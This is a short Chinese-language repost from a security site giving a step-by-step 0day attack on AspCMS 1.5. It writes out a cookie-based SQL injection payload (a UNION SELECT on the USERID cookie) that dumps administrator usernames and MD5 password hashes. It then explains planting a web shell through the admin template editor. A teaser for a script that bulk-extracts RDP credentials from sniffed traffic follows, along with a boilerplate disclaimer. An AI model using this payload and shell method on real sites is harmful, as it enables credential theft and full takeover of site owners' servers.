冒失没人转。。。
Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值
在后面加上注入语句:
UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins |
然后编辑帐号就能看到管理员的帐号和MD5密码值。
后台拿SHELL:
访问admin/_Style/AspCms_TemplateEdit.asp?filename=tmdsb.asp在里面加一句话或者大马。
保存后SHELL在风格目录下面。Templates/default/html/tmdsb.asp
文章来源于lcx.cc:Aspcms 1.5 COOKIES注入0day
相关推荐: Cain嗅探到的RDP包批量解析为用户名+密码的php脚本
昨天晚上开始嗅探,好家伙好几百个包,网上搜了一下有一款工具叫“Cain RDP Parser”,好家伙,一个一个选,玩死人的。。。索性写了个PHP脚本来批量解析。凑合着用。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论